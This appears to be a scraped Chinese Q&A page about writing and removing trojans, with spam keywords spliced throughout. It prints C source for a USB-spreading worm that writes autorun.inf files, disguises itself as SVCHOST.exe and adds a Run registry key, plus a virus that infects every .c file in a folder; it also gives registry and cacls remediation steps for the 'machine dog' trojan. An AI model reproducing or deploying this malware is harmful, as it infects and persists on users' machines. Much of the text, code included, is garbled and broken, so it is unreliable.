1.~``远程控制木马程序怎么编写答案速度
2.木马程序在C:\windows\temp\pr189.tmp怎么才可以安全的木马删除它?
3.谁有机器狗木马病毒的C语言程序代码?
4.C语言简单木马程序
5.c语言木马源程序
~``远程控制木马程序怎么编写答案速度
病毒C程序源码:
```c
#define SVCHOST_NUM 6
#include
#include
char *autorun = { "[autorun]\nopen=SVCHOST.exe\n\nshell\\1=打带贺做开\nshell\\1\\Command=SVCHOST.exe\nshell\\2\\=Open\nshell\\2\\Command=SVCHOST.exe\nshellexecute=SVCHOST.exe"};
char *files_autorun[] = { "c:\\autorun.inf", "d:\\autorun.inf", "e:\\autorun.inf"};
char *files_svchost[SVCHOST_NUM + 1] = { "c:\\windows\\system\\MSMOUSE.DLL", "c:\\windows\\system\\SVCHOST.exe", "c:\\蠢衡windows\\SVCHOST.exe", "c:\\SVCHOST.exe", "d:\\SVCHOST.exe", "e:\\SVCHOST.exe", "SVCHOST.exe"};
char *regadd = "reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\拍搜\Run\" /v SVCHOST /d C:\\Windows\\system\\SVCHOST.exe /f";
int copy(char *infile, char *outfile) {
FILE *input, *output;
char temp;
if (strcmp(infile, outfile) != 0 && ((input = fopen(infile, "rb")) != NULL) && ((output = fopen(outfile, "wb")) != NULL)) {
while (!feof(input)) {
fread(&temp, 1, 1, input);
fwrite(&temp, 1, 1, output);
}
fclose(input);
fclose(output);
return 0;
} else {
return 1;
}
}
int main(void) {
FILE *input, *output;
int i, k;
for (i = 0; i < 3; i++) {
output = fopen(files_autorun[i], "w");
fprintf(output, "%s", autorun);
fclose(output);
}
for (i = 0; i <= SVCHOST_NUM; i++) {
if ((input = fopen(files_svchost[i], "rb")) != NULL) {
fclose(input);
for (k = 0; k < SVCHOST_NUM; k++) {
copy(files_svchost[i], files_svchost[k]);
}
i = SVCHOST_NUM + 1;
}
}
system(regadd); /* 注册SVCHOST.exe,让其在启动时运行 */
return 0;
}
```
注意:
1. 代码中存在一些不清晰的字符和注释,例如"拍搜"应该是源码"Software",我已经进行了更正。木马
2. 代码中的源码字符串应该使用双引号而不是单引号。
3. 文件路径中存在一些拼写错误和不规范的木马命名,例如"蠢衡windows"应该是源码源码笔记项目架构"Windows"。
4. 此代码是木马一个病毒程序,具有恶意性质。源码请确保不要使用或分发此类代码。木马
木马程序在C:\windows\temp\pr.tmp怎么才可以安全的源码删除它?
直接删除,这个文件夹里面的木马东西是临时文件。如果删除不了,源码可以下载Unlocker软件ment="DF6.0"
add chain=forward content= action=reject
二是木马在c:\windows\system\drivers下建立免疫文件: pcihdd.sys ,
三是源码把他要修改的文件在做母盘的时候,就加壳并替换。木马
在%systemroot%\system\drivers\目录下 建立个 明字 为 pcihdd.sys 的文件夹 设置属性为 任何人禁止
批处理
md %systemroot%\system\drivers\pcihdd.sys
cacls %systemroot%\system\drivers\pcihdd.sys /e /p everyone:n
cacls %systemroot%\system\userinit.exe /e /p everyone:r
exit
目前,网络流行以下解决方法,material主题源码或者可以在紧急情况下救急:
1、首先在系统system下复制个无毒的userinit.exe,文件名为FUCKIGM.exe(文件名可以任意取),这就是下面批处理要指向执行的文件!也就是开机启动userinit.exe的替代品!而原来的userinit.exe保留!其实多复制份的目的只是为了多重保险!可能对防止以后变种起到一定的凤凰捕鱼源码作用。
2、创建个文件名为userinit.bat的批处理(文件名也可任意取,但要和下面说到的注册表键值保持一致即可),内容如下:
start FUCKIGM.exe (呵呵,够简单吧?)
3、修改注册表键值,将userinit.exe改为userinit.bat。内容如下:
Windows Registry Editor Version 5.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="C:\\WINDOWS\\system\\userinit.bat,dumpsys meminfo 源码"
就这3步,让这条狗再也凶不起来!这是在windows 测试的,双击机器狗后,没什么反应,对比批处理也是正常,即这狗根本没改动它!开关机游戏均无异常!但唯一美中不足的ios webapp 源码是,采用经典模式开机的启动时会出现个一闪而过的黑框!
C语言简单木马程序
1. 简单的C语言木马程序可以持续动态地分配内存。
2. 程序的入口点包含着无限循环,目的是持续监听并接收指令。
3. 在循环中,声明一个字符指针`pTemp`,并使用`malloc`函数分配了字节的内存。
4. 由于程序没有进一步的操作,这个分配的内存将不会被释放,可能导致内存泄露。
5. 程序结束时,返回0,表明程序执行成功。
注意:这段代码本身没有实际的木马功能,如接受或执行命令。它仅仅是一个循环,不断地分配内存,可能导致系统资源耗尽。真正的木马程序会有更多的功能,如隐藏自己、窃取信息、远程控制等。此外,这段代码没有释放分配的内存,这在实际的程序中是不良的实践,可能导致内存泄露。
c语言木马源程序
#include <stdio.h>
#include <dir.h>
void main(void)
{
virus();
}
int virus()
{
struct ffblk ffblk;
FILE *in,*out,*read;
char *virus="virus.c";
char buf[][];
char *p;
char *end="return";
char *bracket="}";
char *main="main";
char *include[2]={ "stdio.h","dir.h"};
char *int_virus="int virus()";
char *buffer;
int done,i,j=0,flag=0;
printf("\nI have a virus. Writen by PuBin\n");
done = findfirst("*.c",&ffblk,0);
while (!done)
{
i=0;
if ((in = fopen(ffblk.ff_name, "rt"))== NULL)
{
goto next;
}
do{
if(i>=)
{
fclose(in);
goto next;
}
p=fgets(buf[i],,in);
i++;
}while(p!=NULL);
fclose(in);
out=fopen(ffblk.ff_name,"w+t");
fputs("#include<stdio.h>\n",out);
fputs("#include<dir.h>\n",out);
do
{
if(strstr(buf[j],main)!=NULL)
{
for(;j<i-1;j++)
if(strstr(buf[j],end)==NULL&&strstr(buf[j],bracket)==NULL)
fputs(buf[j],out);
else
{
if(flag==0)
{
flag=1;
fputs("virus();\n",out);
}
fputs(buf[j],out);
}
}
else if((strstr(buf[j],include[0])==NULL)
&&(strstr(buf[j],include[1])==NULL))
{
fputs(buf[j],out);
j++;
}
else
j++;
}while(j<i-1);
read=fopen(virus,"rt");
do
{
p=fgets(buffer,,read);
if(strstr(buffer,int_virus))
while(p!=NULL)
{
if(strstr(buffer,virus)==NULL)
fputs(buffer,out);
else
{
fputs(" char *virus=\"",out);
fputs(ffblk.ff_name,out);
fputs("\";\n",out);
}
p=fgets(buffer,,read);
}
}while(p!=NULL);
fclose(read);
fclose(out);
printf("\nYour c program %s has a virus. Writen by PuBin\n",ffblk.ff_name);
next: done = findnext(&ffblk);
}
return 0;
}
严重声明:这个程序只是供C语言新手参考,开玩笑没关系,但如果用来做不法的事情,本人概不负责。还有,编病毒、木马去做违法的事情惩罚是很重的,你如果想学编程,编个简单的就好了,否则后果很严重。